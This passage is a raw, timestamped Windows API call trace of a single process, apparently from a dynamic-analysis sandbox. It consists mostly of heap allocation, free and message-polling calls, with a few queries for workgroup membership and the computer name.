wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9db68 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79e08 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24ea0 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79bf8 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a648 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24e70 [0263.604] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a648 | out: hHeap=0xc60000) returned 1 [0263.604] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e70 | out: hHeap=0xc60000) returned 1 [0263.604] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9db90 [0263.604] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a648 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24e70 [0263.605] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a648 | out: hHeap=0xc60000) returned 1 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dbb8 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a648 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a618 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f10 [0263.605] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a618 | out: hHeap=0xc60000) returned 1 [0263.605] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f10 | out: hHeap=0xc60000) returned 1 [0263.605] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dbe0 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a618 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f10 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79bc8 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d78 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f20 [0263.605] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d78 | out: hHeap=0xc60000) returned 1 [0263.605] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f20 | out: hHeap=0xc60000) returned 1 [0263.605] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dc08 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d78 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f20 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79be0 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a690 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f30 [0263.605] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a690 | out: hHeap=0xc60000) returned 1 [0263.605] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f30 | out: hHeap=0xc60000) returned 1 [0263.605] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dc30 [0263.605] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a690 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f30 [0263.606] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a690 | out: hHeap=0xc60000) returned 1 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dc58 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a690 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6a8 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f40 [0263.606] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6a8 | out: hHeap=0xc60000) returned 1 [0263.606] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f40 | out: hHeap=0xc60000) returned 1 [0263.606] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dc80 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6a8 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f40 [0263.606] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6a8 | out: hHeap=0xc60000) returned 1 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dca8 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6a8 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f50 [0263.606] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0263.606] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f50 | out: hHeap=0xc60000) returned 1 [0263.606] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dcd0 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f50 [0263.606] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dcf8 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a300 [0263.606] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f60 [0263.606] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a300 | out: hHeap=0xc60000) returned 1 [0263.607] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f60 | out: hHeap=0xc60000) returned 1 [0263.607] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dd20 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a300 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f60 [0263.607] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a300 | out: hHeap=0xc60000) returned 1 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xedf1c0 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a300 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3a8 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f70 [0263.607] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3a8 | out: hHeap=0xc60000) returned 1 [0263.607] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f70 | out: hHeap=0xc60000) returned 1 [0263.607] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dd48 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3a8 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f70 [0263.607] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3a8 | out: hHeap=0xc60000) returned 1 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dd70 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3a8 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f80 [0263.607] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0263.607] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f80 | out: hHeap=0xc60000) returned 1 [0263.607] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dd98 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f80 [0263.607] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xedf1f8 [0263.607] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dd8 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24f90 [0263.608] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79dd8 | out: hHeap=0xc60000) returned 1 [0263.608] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24f90 | out: hHeap=0xc60000) returned 1 [0263.608] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9ddc0 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dd8 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24f90 [0263.608] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79dd8 | out: hHeap=0xc60000) returned 1 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9dde8 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dd8 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a708 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24fa0 [0263.608] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a708 | out: hHeap=0xc60000) returned 1 [0263.608] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24fa0 | out: hHeap=0xc60000) returned 1 [0263.608] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9de10 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a708 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24fa0 [0263.608] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a708 | out: hHeap=0xc60000) returned 1 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9de38 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a708 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24fb0 [0263.608] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0263.608] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24fb0 | out: hHeap=0xc60000) returned 1 [0263.608] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9de60 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0263.608] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24fb0 [0263.609] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9de88 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe192e8 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24fc0 [0263.609] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe192e8 | out: hHeap=0xc60000) returned 1 [0263.609] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24fc0 | out: hHeap=0xc60000) returned 1 [0263.609] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9deb0 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe192e8 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe24fc0 [0263.609] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe192e8 | out: hHeap=0xc60000) returned 1 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9ded8 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe192e8 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe19048 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24fd0 [0263.609] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe19048 | out: hHeap=0xc60000) returned 1 [0263.609] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24fd0 | out: hHeap=0xc60000) returned 1 [0263.609] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9df00 [0263.609] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe19048 [0263.625] SendMessageW (hWnd=0x50166, Msg=0xb1, wParam=0xf4240, lParam=0xf423f) returned 0x1 [0263.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7f020 | out: hHeap=0xc60000) returned 1 [0263.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0e90 | out: hHeap=0xc60000) returned 1 [0263.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ef60 | out: hHeap=0xc60000) returned 1 [0263.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xf09bc8 | out: hHeap=0xc60000) returned 1 [0263.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0ec0 | out: hHeap=0xc60000) returned 1 [0263.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7eff0 | out: hHeap=0xc60000) returned 1 [0263.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7eed0 | out: hHeap=0xc60000) returned 1 [0263.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebacd8 | out: hHeap=0xc60000) returned 1 [0263.625] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.632] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x91ed50, BufferType=0x91ed68 | out: lpNameBuffer=0x91ed50*="WORKGROUP", BufferType=0x91ed68) returned 0x0 [0263.639] NetApiBufferSize (in: Buffer=0xe905b8, ByteCount=0x91e700 | out: ByteCount=0x91e700) returned 0x0 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83a48 | out: hHeap=0xc60000) returned 1 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1ac0 | out: hHeap=0xc60000) returned 1 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe812d0 | out: hHeap=0xc60000) returned 1 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef0f10 | out: hHeap=0xc60000) returned 1 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83940 | out: hHeap=0xc60000) returned 1 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7f0e0 | out: hHeap=0xc60000) returned 1 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe837f0 | out: hHeap=0xc60000) returned 1 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83ac0 | out: hHeap=0xc60000) returned 1 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7eed0 | out: hHeap=0xc60000) returned 1 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7f008 | out: hHeap=0xc60000) returned 1 [0263.650] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebad50 | out: hHeap=0xc60000) returned 1 [0263.650] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.655] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x91ed50, BufferType=0x91ed68 | out: lpNameBuffer=0x91ed50*="WORKGROUP", BufferType=0x91ed68) returned 0x0 [0263.662] NetApiBufferSize (in: Buffer=0xe905b8, ByteCount=0x91e700 | out: ByteCount=0x91e700) returned 0x0 [0263.672] GetComputerNameW (in: lpBuffer=0x91f520, nSize=0x91f83c | out: lpBuffer="XDUWTFONO", nSize=0x91f83c) returned 1 [0263.672] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83988 [0263.672] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb200 [0263.672] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1b70 [0263.672] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7158 | out: hHeap=0xc60000) returned 1 [0263.672] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19a0 | out: hHeap=0xc60000) returned 1 [0263.672] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb200 | out: hHeap=0xc60000) returned 1 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1b70 | out: hHeap=0xc60000) returned 1 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83988 | out: hHeap=0xc60000) returned 1 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83988 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83988 | out: hHeap=0xc60000) returned 1 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83988 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83988 | out: hHeap=0xc60000) returned 1 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83988 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83988 | out: hHeap=0xc60000) returned 1 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7158 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1b70 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83988 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe836b8 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef19a0 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7158 | out: hHeap=0xc60000) returned 1 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1b70 | out: hHeap=0xc60000) returned 1 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe836b8 | out: hHeap=0xc60000) returned 1 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19a0 | out: hHeap=0xc60000) returned 1 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83988 | out: hHeap=0xc60000) returned 1 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7158 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef19a0 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83988 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe836b8 [0263.673] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1b70 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7158 | out: hHeap=0xc60000) returned 1 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19a0 | out: hHeap=0xc60000) returned 1 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe836b8 | out: hHeap=0xc60000) returned 1 [0263.673] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1b70 | out: hHeap=0xc60000) returned 1 [0263.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83988 | out: hHeap=0xc60000) returned 1 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83988 [0263.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83988 | out: hHeap=0xc60000) returned 1 [0263.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca3d8 | out: hHeap=0xc60000) returned 1 [0263.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef19e0 | out: hHeap=0xc60000) returned 1 [0263.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1aa0 | out: hHeap=0xc60000) returned 1 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83988 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1aa0 [0263.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1aa0 | out: hHeap=0xc60000) returned 1 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe836b8 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1aa0 [0263.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1aa0 | out: hHeap=0xc60000) returned 1 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe839b8 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1aa0 [0263.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1aa0 | out: hHeap=0xc60000) returned 1 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe837f0 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1aa0 [0263.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1aa0 | out: hHeap=0xc60000) returned 1 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7f0b0 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1aa0 [0263.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1aa0 | out: hHeap=0xc60000) returned 1 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x33c) returned 0xede798 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa0) returned 0xda0448 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7f080 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1aa0 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7f008 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef19e0 [0263.674] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83ac0 [0263.675] 